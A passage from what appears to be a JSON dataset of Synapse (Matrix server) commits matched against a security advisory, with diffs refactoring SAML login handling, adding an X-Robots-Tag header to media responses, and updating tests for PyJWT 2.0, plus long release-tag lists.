b/changelog.d/8938.feature", + "@@ -0,0 +1 @@", + "+Add support for allowing users to pick their own user ID during a single-sign-on login.", + "diff --git a/synapse/handlers/saml_handler.py b/synapse/handlers/saml_handler.py", + "index f2ca1ddb5..6001fe3e2 100644", + "--- a/synapse/handlers/saml_handler.py", + "+++ b/synapse/handlers/saml_handler.py", + "@@ -165,2 +165,25 @@ class SamlHandler(BaseHandler):", + " logger.debug(\"SAML2 response: %s\", saml2_auth.origxml)", + "+", + "+ await self._handle_authn_response(request, saml2_auth, relay_state)", + "+", + "+ async def _handle_authn_response(", + "+ self,", + "+ request: SynapseRequest,", + "+ saml2_auth: saml2.response.AuthnResponse,", + "+ relay_state: str,", + "+ ) -> None:", + "+ \"\"\"Handle an AuthnResponse, having parsed it from the request params", + "+", + "+ Assumes that the signature on the response object has been checked. Maps", + "+ the user onto an MXID, registering them if necessary, and returns a response", + "+ to the browser.", + "+", + "+ Args:", + "+ request: the incoming request from the browser. We'll respond to it with an", + "+ HTML page or a redirect", + "+ saml2_auth: the parsed AuthnResponse object", + "+ relay_state: the RelayState query param, which encodes the URI to rediret", + "+ back to", + "+ \"\"\"", + "+", + " for assertion in saml2_auth.assertions:", + "diff --git a/tests/handlers/test_oidc.py b/tests/handlers/test_oidc.py", + "index 9878527ba..464e569ac 100644", + "--- a/tests/handlers/test_oidc.py", + "+++ b/tests/handlers/test_oidc.py", + "@@ -25,3 +25,3 @@ from synapse.types import UserID", + "-from tests.test_utils import FakeResponse", + "+from tests.test_utils import FakeResponse, simple_async_mock", + " from tests.unittest import HomeserverTestCase, override_config", + "@@ -84,12 +84,2 @@ class TestMappingProviderFailures(TestMappingProvider):", + "-def simple_async_mock(return_value=None, raises=None) -> Mock:", + "- # AsyncMock is not available in python3.5, this mimics part of its behaviour", + "- async def cb(*args, **kwargs):", + "- if raises:", + "- raise raises", + "- return return_value", + "-", + "- return Mock(side_effect=cb)", + "-", + "-", + " async def get_json(url):", + "diff --git a/tests/handlers/test_saml.py b/tests/handlers/test_saml.py", + "index d21e5588c..69927cf6b 100644", + "--- a/tests/handlers/test_saml.py", + "+++ b/tests/handlers/test_saml.py", + "@@ -14,2 +14,6 @@", + "+from typing import Optional", + "+", + "+from mock import Mock", + "+", + " import attr", + "@@ -17,4 +21,4 @@ import attr", + " from synapse.api.errors import RedirectException", + "-from synapse.handlers.sso import MappingException", + "+from tests.test_utils import simple_async_mock", + " from tests.unittest import HomeserverTestCase, override_config", + "@@ -46,2 +50,4 @@ class FakeAuthnResponse:", + " ava = attr.ib(type=dict)", + "+ assertions = attr.ib(type=list, factory=list)", + "+ in_response_to = attr.ib(type=Optional[str], default=None)", + "@@ -113,11 +119,18 @@ class SamlHandlerTestCase(HomeserverTestCase):", + " \"\"\"Ensure that mapping the SAML response returned from a provider to an MXID works properly.\"\"\"", + "+", + "+ # stub out the auth handler", + "+ auth_handler = self.hs.get_auth_handler()", + "+ auth_handler.complete_sso_login = simple_async_mock()", + "+", + "+ # send a mocked-up SAML response to the callback", + " saml_response = FakeAuthnResponse({\"uid\": \"test_user\", \"username\": \"test_user\"})", + "- # The redirect_url doesn't matter with the default user mapping provider.", + "- redirect_url = \"\"", + "- mxid = self.get_success(", + "- self.handler._map_saml_response_to_user(", + "- saml_response, redirect_url, \"user-agent\", \"10.10.10.10\"", + "- )", + "+ request = _mock_request()", + "+ self.get_success(", + "+ self.handler._handle_authn_response(request, saml_response, \"redirect_uri\")", + "+ )", + "+", + "+ # check that the auth handler got called as expected", + "+ auth_handler.complete_sso_login.assert_called_once_with(", + "+ \"@test_user:test\", request, \"redirect_uri\"", + " )", + "- self.assertEqual(mxid, \"@test_user:test\")", + "@@ -131,2 +144,6 @@ class SamlHandlerTestCase(HomeserverTestCase):", + "+ # stub out the auth handler", + "+ auth_handler = self.hs.get_auth_handler()", + "+ auth_handler.complete_sso_login = simple_async_mock()", + "+", + " # Map a user via SSO.", + "@@ -135,17 +152,20 @@ class SamlHandlerTestCase(HomeserverTestCase):", + " )", + "- redirect_url = \"\"", + "- mxid = self.get_success(", + "- self.handler._map_saml_response_to_user(", + "- saml_response, redirect_url, \"user-agent\", \"10.10.10.10\"", + "- )", + "+ request = _mock_request()", + "+ self.get_success(", + "+ self.handler._handle_authn_response(request, saml_response, \"\")", + "+ )", + "+", + "+ # check that the auth handler got called as expected", + "+ auth_handler.complete_sso_login.assert_called_once_with(", + "+ \"@test_user:test\", request, \"\"", + " )", + "- self.assertEqual(mxid, \"@test_user:test\")", + " # Subsequent calls should map to the same mxid.", + "- mxid = self.get_success(", + "- self.handler._map_saml_response_to_user(", + "- saml_response, redirect_url, \"user-agent\", \"10.10.10.10\"", + "- )", + "+ auth_handler.complete_sso_login.reset_mock()", + "+ self.get_success(", + "+ self.handler._handle_authn_response(request, saml_response, \"\")", + "+ )", + "+ auth_handler.complete_sso_login.assert_called_once_with(", + "+ \"@test_user:test\", request, \"\"", + " )", + "- self.assertEqual(mxid, \"@test_user:test\")", + "@@ -153,11 +173,20 @@ class SamlHandlerTestCase(HomeserverTestCase):", + " \"\"\"If the mapping provider generates an invalid localpart it should be rejected.\"\"\"", + "+", + "+ # stub out the auth handler", + "+ auth_handler = self.hs.get_auth_handler()", + "+ auth_handler.complete_sso_login = simple_async_mock()", + "+", + "+ # mock out the error renderer too", + "+ sso_handler = self.hs.get_sso_handler()", + "+ sso_handler.render_error = Mock(return_value=None)", + "+", + " saml_response = FakeAuthnResponse({\"uid\": \"test\", \"username\": \"f\u00c3\u00b6\u00c3\u00b6\"})", + "- redirect_url = \"\"", + "- e = self.get_failure(", + "- self.handler._map_saml_response_to_user(", + "- saml_response, redirect_url, \"user-agent\", \"10.10.10.10\"", + "- ),", + "- MappingException,", + "+ request = _mock_request()", + "+ self.get_success(", + "+ self.handler._handle_authn_response(request, saml_response, \"\"),", + "+ )", + "+ sso_handler.render_error.assert_called_once_with(", + "+ request, \"mapping_error\", \"localpart is invalid: f\u00c3\u00b6\u00c3\u00b6\"", + " )", + "- self.assertEqual(str(e.value), \"localpart is invalid: f\u00c3\u00b6\u00c3\u00b6\")", + "+ auth_handler.complete_sso_login.assert_not_called()", + "@@ -165,2 +194,10 @@ class SamlHandlerTestCase(HomeserverTestCase):", + " \"\"\"The mapping provider can retry generating an MXID if the MXID is already in use.\"\"\"", + "+", + "+ # stub out the auth handler and error renderer", + "+ auth_handler = self.hs.get_auth_handler()", + "+ auth_handler.complete_sso_login = simple_async_mock()", + "+ sso_handler = self.hs.get_sso_handler()", + "+ sso_handler.render_error = Mock(return_value=None)", + "+", + "+ # register a user to occupy the first-choice MXID", + " store = self.hs.get_datastore()", + "@@ -169,11 +206,15 @@ class SamlHandlerTestCase(HomeserverTestCase):", + " )", + "+", + "+ # send the fake SAML response", + " saml_response = FakeAuthnResponse({\"uid\": \"test\", \"username\": \"test_user\"})", + "- redirect_url = \"\"", + "- mxid = self.get_success(", + "- self.handler._map_saml_response_to_user(", + "- saml_response, redirect_url, \"user-agent\", \"10.10.10.10\"", + "- )", + "+ request = _mock_request()", + "+ self.get_success(", + "+ self.handler._handle_authn_response(request, saml_response, \"\"),", + " )", + "+", + " # test_user is already taken, so test_user1 gets registered instead.", + "- self.assertEqual(mxid, \"@test_user1:test\")", + "+ auth_handler.complete_sso_login.assert_called_once_with(", + "+ \"@test_user1:test\", request, \"\"", + "+ )", + "+ auth_handler.complete_sso_login.reset_mock()", + "@@ -190,11 +231,11 @@ class SamlHandlerTestCase(HomeserverTestCase):", + " saml_response = FakeAuthnResponse({\"uid\": \"tester\", \"username\": \"tester\"})", + "- e = self.get_failure(", + "- self.handler._map_saml_response_to_user(", + "- saml_response, redirect_url, \"user-agent\", \"10.10.10.10\"", + "- ),", + "- MappingException,", + "+ self.get_success(", + "+ self.handler._handle_authn_response(request, saml_response, \"\"),", + " )", + "- self.assertEqual(", + "- str(e.value), \"Unable to generate a Matrix ID from the SSO response\"", + "+ sso_handler.render_error.assert_called_once_with(", + "+ request,", + "+ \"mapping_error\",", + "+ \"Unable to generate a Matrix ID from the SSO response\",", + " )", + "+ auth_handler.complete_sso_login.assert_not_called()", + "@@ -210,8 +251,8 @@ class SamlHandlerTestCase(HomeserverTestCase):", + " def test_map_saml_response_redirect(self):", + "+ \"\"\"Test a mapping provider that raises a RedirectException\"\"\"", + "+", + " saml_response = FakeAuthnResponse({\"uid\": \"test\", \"username\": \"test_user\"})", + "- redirect_url = \"\"", + "+ request = _mock_request()", + " e = self.get_failure(", + "- self.handler._map_saml_response_to_user(", + "- saml_response, redirect_url, \"user-agent\", \"10.10.10.10\"", + "- ),", + "+ self.handler._handle_authn_response(request, saml_response, \"\"),", + " RedirectException,", + "@@ -219 +260,6 @@ class SamlHandlerTestCase(HomeserverTestCase):", + " self.assertEqual(e.value.location, b\"https://custom-saml-redirect/\")", + "+", + "+", + "+def _mock_request():", + "+ \"\"\"Returns a mock which will stand in as a SynapseRequest\"\"\"", + "+ return Mock(spec=[\"getClientIP\", \"get_user_agent\"])", + "diff --git a/tests/test_utils/__init__.py b/tests/test_utils/__init__.py", + "index 6873d45eb..43898d814 100644", + "--- a/tests/test_utils/__init__.py", + "+++ b/tests/test_utils/__init__.py", + "@@ -24,2 +24,4 @@ from typing import Any, Awaitable, Callable, TypeVar", + "+from mock import Mock", + "+", + " import attr", + "@@ -89,2 +91,12 @@ def setup_awaitable_errors() -> Callable[[], None]:", + "+def simple_async_mock(return_value=None, raises=None) -> Mock:", + "+ # AsyncMock is not available in python3.5, this mimics part of its behaviour", + "+ async def cb(*args, **kwargs):", + "+ if raises:", + "+ raise raises", + "+ return return_value", + "+", + "+ return Mock(side_effect=cb)", + "+", + "+", + " @attr.s" + ], + "changed_files": [ + "changelog.d/8938.feature", + "synapse/handlers/saml_handler.py", + "tests/handlers/test_oidc.py", + "tests/handlers/test_saml.py", + "tests/test_utils/__init__.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8938": "Push login completion down into SsoHandler #8941 Debian builds fail with ascii encoding error on older distros #9076" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8938, 8938", + "relevance": 32 + }, + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: reference", + "relevance": 4 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8938", + "relevance": 2 + } + ] + }, + { + "commit_id": "cd9e72b185e36ac3f18ab1fe567fdeee87bfcb8e", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607467863, + "hunks": 3, + "message": "Add X-Robots-Tag header to stop crawlers from indexing media (#8887) Fixes / related to: https://github.com/matrix-org/synapse/issues/6533 This should do essentially the same thing as a robots.txt file telling robots to not index the media repo. https://developers.google.com/search/reference/robots_meta_tag Signed-off-by: Aaron Raimist ", + "diff": [ + "diff --git a/changelog.d/8887.feature b/changelog.d/8887.feature", + "new file mode 100644", + "index 000000000..729eb1f1e", + "--- /dev/null", + "+++ b/changelog.d/8887.feature", + "@@ -0,0 +1 @@", + "+Add `X-Robots-Tag` header to stop web crawlers from indexing media.", + "diff --git a/synapse/rest/media/v1/_base.py b/synapse/rest/media/v1/_base.py", + "index 67aa993f1..47c2b44bf 100644", + "--- a/synapse/rest/media/v1/_base.py", + "+++ b/synapse/rest/media/v1/_base.py", + "@@ -157,2 +157,7 @@ def add_file_headers(request, media_type, file_size, upload_name):", + "+ # Tell web crawlers to not index, archive, or follow links in media. This", + "+ # should help to prevent things in the media repo from showing up in web", + "+ # search results.", + "+ request.setHeader(b\"X-Robots-Tag\", \"noindex, nofollow, noarchive, noimageindex\")", + "+", + "diff --git a/tests/rest/media/v1/test_media_storage.py b/tests/rest/media/v1/test_media_storage.py", + "index 4c749f1a6..6f0677d33 100644", + "--- a/tests/rest/media/v1/test_media_storage.py", + "+++ b/tests/rest/media/v1/test_media_storage.py", + "@@ -364 +364,14 @@ class MediaRepoTests(unittest.HomeserverTestCase):", + " )", + "+", + "+ def test_x_robots_tag_header(self):", + "+ \"\"\"", + "+ Tests that the `X-Robots-Tag` header is present, which informs web crawlers", + "+ to not index, archive, or follow links in media.", + "+ \"\"\"", + "+ channel = self._req(b\"inline; filename=out\" + self.test_image.extension)", + "+", + "+ headers = channel.headers", + "+ self.assertEqual(", + "+ headers.getRawHeaders(b\"X-Robots-Tag\"),", + "+ [b\"noindex, nofollow, noarchive, noimageindex\"],", + "+ )" + ], + "changed_files": [ + "changelog.d/8887.feature", + "synapse/rest/media/v1/_base.py", + "tests/rest/media/v1/test_media_storage.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8887": "Add X-Robots-Tag header t2bot/matrix-media-repo#303 Default robots.txt for media repo #6533" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8887, 8887", + "relevance": 32 + }, + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: reference, issue, file", + "relevance": 4 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8887", + "relevance": 2 + } + ] + }, + { + "commit_id": "a8026064755362fe3e5dc00f537606d340ce242a", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608660014, + "hunks": 3, + "message": "Support PyJWT v2.0.0. (#8986) Tests were broken due to an API changing. The code used in Synapse proper should be compatible with both versions already.", + "diff": [ + "diff --git a/changelog.d/8986.misc b/changelog.d/8986.misc", + "new file mode 100644", + "index 000000000..6aefc7878", + "--- /dev/null", + "+++ b/changelog.d/8986.misc", + "@@ -0,0 +1 @@", + "+Support using PyJWT v2.0.0 in the test suite.", + "diff --git a/tests/rest/client/v1/test_login.py b/tests/rest/client/v1/test_login.py", + "index 566776e97..18932d751 100644", + "--- a/tests/rest/client/v1/test_login.py", + "+++ b/tests/rest/client/v1/test_login.py", + "@@ -477,4 +477,8 @@ class JWTTestCase(unittest.HomeserverTestCase):", + "- def jwt_encode(self, token, secret=jwt_secret):", + "- return jwt.encode(token, secret, self.jwt_algorithm).decode(\"ascii\")", + "+ def jwt_encode(self, token: str, secret: str = jwt_secret) -> str:", + "+ # PyJWT 2.0.0 changed the return type of jwt.encode from bytes to str.", + "+ result = jwt.encode(token, secret, self.jwt_algorithm)", + "+ if isinstance(result, bytes):", + "+ return result.decode(\"ascii\")", + "+ return result", + "@@ -682,4 +686,8 @@ class JWTPubKeyTestCase(unittest.HomeserverTestCase):", + "- def jwt_encode(self, token, secret=jwt_privatekey):", + "- return jwt.encode(token, secret, \"RS256\").decode(\"ascii\")", + "+ def jwt_encode(self, token: str, secret: str = jwt_privatekey) -> str:", + "+ # PyJWT 2.0.0 changed the return type of jwt.encode from bytes to str.", + "+ result = jwt.encode(token, secret, \"RS256\")", + "+ if isinstance(result, bytes):", + "+ return result.decode(\"ascii\")", + "+ return result" + ], + "changed_files": [ + "changelog.d/8986.misc", + "tests/rest/client/v1/test_login.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8986": "" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + 